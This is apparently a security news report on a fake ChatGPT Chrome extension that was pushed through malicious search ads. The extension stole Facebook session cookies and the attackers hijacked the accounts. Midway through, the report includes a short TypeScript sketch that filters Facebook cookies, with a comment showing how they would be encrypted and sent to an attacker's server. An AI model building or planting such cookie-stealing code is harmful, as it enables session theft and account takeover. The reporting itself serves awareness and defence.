Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack users' accounts.
The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on, attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023.
According to Guardio Labs researcher Nati Tal, the extension was propagated through malicious sponsored Google search results that were designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on.
Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate them to a remote server in an encrypted manner.
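To illustrate the mechanic (a minimal sketch, not the actual extension's code – the function names and domain list below are hypothetical): an extension granted the `cookies` permission can call the documented `chrome.cookies.getAll` API, filter the results for Facebook domains, and ship the matches off-host. The filtering step looks roughly like this:

```typescript
// Subset of the Cookie shape returned by chrome.cookies.getAll
// (these three fields exist in the real Chrome extensions API).
interface Cookie {
  domain: string;
  name: string;
  value: string;
}

// Keep only cookies scoped to Facebook domains -- the session
// tokens an account hijacker needs to impersonate the victim.
function harvestFacebookCookies(all: Cookie[]): Cookie[] {
  return all.filter(
    c => c.domain === "facebook.com" || c.domain.endsWith(".facebook.com")
  );
}

// In a live extension this would be driven by something like:
//   chrome.cookies.getAll({}, cookies => send(encrypt(harvestFacebookCookies(cookies))));
// where send() posts the encrypted blob to the attacker's server.
```

The key point is that no exploit is required: the `cookies` permission, once approved at install time, grants read access to session cookies for every site.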
Once in possession of the victim's cookies, the threat actor moves to seize control of the Facebook account, change the password, alter the profile name and picture, and even use it to disseminate extremist propaganda.
This makes it the second fake ChatGPT Chrome browser extension to be discovered in the wild. The other extension, which also functioned as a Facebook account stealer, was distributed via sponsored posts on the social media platform.
If anything, the findings offer further proof that cybercriminals can swiftly adapt their campaigns to cash in on the popularity of ChatGPT, distributing malware and staging opportunistic attacks.
"For threat actors, the possibilities are endless — using your profile as a bot for comments, likes, and other promotional activities, or creating pages and advertisement accounts using your reputation and identity while promoting services that are both legitimate and probably mostly not," Tal said.